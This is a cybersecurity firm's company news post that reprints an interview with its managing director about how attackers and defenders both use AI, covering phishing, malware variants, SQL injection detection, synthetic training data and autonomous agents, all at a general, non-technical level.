Right back at you: AI vs. AI in cybersecurity
Company News|March 11, 2025
The meteoric rise of AI technology mirrors a double-edged sword—unleashing unparalleled efficiency and futuristic innovation while simultaneously exposing vulnerabilities in privacy and cybersecurity. Amid these challenges, SecAI emerges as a trailblazer in the fight against digital threats. In a recent exclusive interview with Tech In Asia, Chase Lee, managing director of SecAI, delves into how the organization harnesses artificial intelligence to combat evolving cyber threats.
Think about how many tech advancements are a double-edged sword. Nuclear power is a zero-emissions energy source, but it is also used to create weapons of mass destruction. Meanwhile, the internet connects us globally, but it allows misinformation to spread faster.
AI is no different.
The tech is often touted as a boon for productivity and data analytics, but malicious actors can make the most of these advantages too.
“AI is helping cybersecurity threats become faster and automated, more sophisticated, and giving them new attack vectors,” says Chase Lee, managing director of cybersecurity firm SecAI.
The good news? There’s nothing stopping the good guys from using AI to fight back.
An unfair matchup
In the cybersecurity space, defenders often play “an unfair game from the start,” says Lee. Attackers don’t follow any rules and can try whatever they want.
With AI, threat actors have gotten even more efficient at building tools and weapons for attacks.
For instance, antiviruses usually work by recognizing certain types of malicious programs and preventing them from being installed on your system. However, attackers can use AI tools to automatically tweak viruses and create scores of variants, making them harder to detect.
Generative AI, in particular, has become a popular tool for attackers. Large language models (LLMs) – generative AI’s underlying tech – for example, can be used to create more believable phishing attacks. Just last year, an employee at a multinational firm was tricked into giving US$25 million to fraudsters after they used deepfakes of the company’s chief financial officer for an online video call.
“AI has made these types of attacks much more effective, and it’s something we haven’t really faced before,” says Lee.
Wielding AI for good
Not all is lost for cybersecurity defenders.
According to Lee, attackers often use what’s known as an SQL injection, which helps them slip malicious code into a target’s system. As such, defenders can use AI to automatically detect the attackers’ code to prevent this.
To train the AI’s detection capabilities, cybersecurity companies will need to collect up to a few million data points and label them to separate safe code from malicious ones. Doing this manually – evidently – takes a lot of effort. However, the proliferation of LLMs has made things considerably easier.
“Many LLMs are already trained with huge volumes of data,” says Lee. “All you need to do is give some examples – perhaps five lines of code – and tell it which parts are malicious. Then it can do the labeling for you.”
However, he says that while safe code is often easy to obtain, examples of malicious code are harder to find, given the shrouded nature of attackers’ operations.
SecAI solved this by creating its own versions of tools similar to what hackers might have, using them to generate synthetic data. Bolstered with robust intelligence gathering capabilities, the firm has eventually gathered over a billion malware samples, millions of data points on different system vulnerabilities, and developed a threat graph with hundreds of billions of nodes, each of which represent a potential attacking entity.
At the same time, SecAI’s researchers regularly track and analyze attack incidents to generate technical reports. Previously, these reports were mainly used as references during attack investigations, Lee says.
“However, as LLMs we develop and fine tune got adopted for cybersecurity, we found that these incident reports are particularly suitable for training AI models, as they help the algorithm understand actual attack techniques and thought processes,” he adds. “This significantly enhances their ability to continuously identify and analyze new attacks.”
In cybersecurity, being able to keep up with the latest threats is also an important factor because of edge cases – instances where the existing model won’t have the training to detect or prevent the attack. For example, an attacker might use a completely new method to pack and hide their malicious code when attempting to hack into a system.
“Once we have enough data on each edge case, we have to retrain a separate model to detect that attack method – it’s a continuous job,” Lee points out.
A versatile weapon
Besides detecting malicious code injections, defenders can also use AI to guard against phishing attacks.
For instance, while an attacker can use an LLM to generate a more believable email, the link they’re using is still inherently unsafe.
AI models can check the URLs in the email, visit the site in a safe manner, and scan through the HTML code to check if the website is safe.
“We can also screenshot the web page and use AI vision models to determine whether it’s the actual site or some kind of fake page,” Lee says.
AI is also helpful for cybersecurity companies’ internal operations. Teams often use a large number of tools, and each gives out their own alerts on potential threats. These alerts can sometimes number in the tens of thousands daily.
“AI can act as an advanced recommendation system for alert prioritization, enabling teams to conduct more thorough analyses and generate reports with greater efficiency.” Lee explains.
Automation is the future
The AI cybersecurity arms race is set to escalate.
AI agents, for one, could soon take attackers’ hacks to the next level. Previously, AI models could automate individual parts of an attack, but the people behind them would still have to manually trigger subsequent steps.
AI agents would be able to think, plan, and evaluate how to launch entire operations on their own. This means it could potentially chain steps automatically, like doing reconnaissance, probing for weaknesses, and then launching the actual attack, all without human intervention.
Thankfully, cybersecurity professionals can have AI agents on their team, too. These systems could eventually detect threats, investigate, and then execute mitigating measures autonomously with high accuracy and speed.
Lee shares that this is something that SecAI is working toward, studying how AI agents can capitalize on threat intelligence and specialized tools to act as “independent cybersecurity enforcers” in the fight against cybercrime.
“Automation will be a key feature for both sides in the next few years, and I believe the growth of AI agents will be something to look out for in 2025,” he says.
Copyright © SECAI PTE LTDAll rights reaserved.Terms & Conditions.